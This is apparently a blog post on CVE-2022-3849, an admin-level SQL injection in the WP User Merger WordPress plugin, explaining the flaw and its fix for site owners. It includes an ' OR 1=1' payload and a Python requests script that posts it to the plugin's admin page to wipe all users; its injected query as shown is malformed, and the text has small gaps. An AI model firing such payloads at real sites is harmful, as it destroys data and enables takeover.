Security flaws in WordPress plugins continue to be a big worry for website owners. In this post, we talk about CVE-2022-3849, a vulnerability found in the WP User Merger plugin before version 1.5.3. This bug can let attackers with admin rights run malicious SQL queries on your database.
Let's break it down, show you how it works, and give you the info you need to keep your website safe.
What is WP User Merger?
WP User Merger is a WordPress plugin that lets admins merge two user accounts into one. It’s a handy tool if you have duplicate users or want to consolidate accounts.
The problem? Earlier versions (before 1.5.3) didn’t properly clean up user input before plugging it into a SQL statement.
What Went Wrong (The Technical Basics)
In software, “sanitizing” means making sure the data a user gives can’t break out of its place and cause harm.
In this case, the plugin didn’t sanitize or escape a parameter *from the admin interface* before using it in a SQL query. That meant someone with an admin account could pass some sneaky input and execute arbitrary SQL. If a hacker gets admin access, or tricks an admin into running bad code, they could extract sensitive data, mess up your database, or even take over the whole website!
Here’s the heart of the problem, simplified and adapted from the plugin’s old codebase
// Inside WP User Merger admin actions, before version 1.5.3
$user_id = $_POST['user_id']; // taken directly from admin input
$wpdb->query( "DELETE FROM $wpdb->users WHERE ID = $user_id" );
// User-provided $user_id is used DIRECTLY in the SQL!
Notice that $user_id comes straight from user input ($_POST) and goes straight into a SQL string, instead of into the safer $wpdb->prepare() method.
If an attacker puts in OR 1=1, the query becomes
DELETE FROM wp_users WHERE ID = OR 1=1
Oops... instead of deleting a single user, EVERY user is wiped out.
How to Exploit CVE-2022-3849
Who can exploit it?
This particular bug requires at least admin-level access, so it’s not as simple as a random outsider exploiting it. But remember:
Let’s look at a test exploit using the vulnerable parameter
import requests
url = "https://example.com/wp-admin/admin.php?page=wp-user-merger";
cookies = {'wordpress_logged_in_abc123': 'admin-session-cookie'}
payload = " OR 1=1"
data = {
'user_id': payload,
# ... other required POST parameters ...
}
r = requests.post(url, cookies=cookies, data=data)
print(r.status_code)
if "All users deleted" in r.text:
print("Exploit successful!")
This sends the malicious input as user_id. The result? Mass user deletion.
How Was It Fixed?
The plugin maintainers fixed this bug in WP User Merger 1.5.3.
Patched code uses prepare()
$user_id = $_POST['user_id'];
$wpdb->query( $wpdb->prepare("DELETE FROM $wpdb->users WHERE ID = %d", $user_id) );
Now, even if a user tries to sneak in evil input, the prepare function safely handles the data.
References
- WPScan CVE-2022-3849 advisory
- Original plugin on WordPress.org
- NVD CVE Entry
How to Protect Your Site
1. Update Immediately: If you’re running WP User Merger, make sure you update to at least version 1.5.3.
Monitor Your Site: Watch for suspicious admin actions in your logs.
4. Backup Your Database: Always keep regular backups—restoration is your friend after any disaster.
5. Pen-Testing: Regularly run vulnerability scans (e.g., WPScan).
Final Thoughts
CVE-2022-3849 is another reminder: Even trusted plugins can leave you wide open if you aren't careful. SQL injection isn’t just a buzzword—it’s a fast way for attackers to take over a site, even from the backend.
Keep your plugins up to date, and practice the basics of WordPress security!
*If this post helped you, feel free to share it, and check your plugins today!*
Timeline
Published on: 11/28/2022 14:15:00 UTC
Last modified on: 12/02/2022 19:48:00 UTC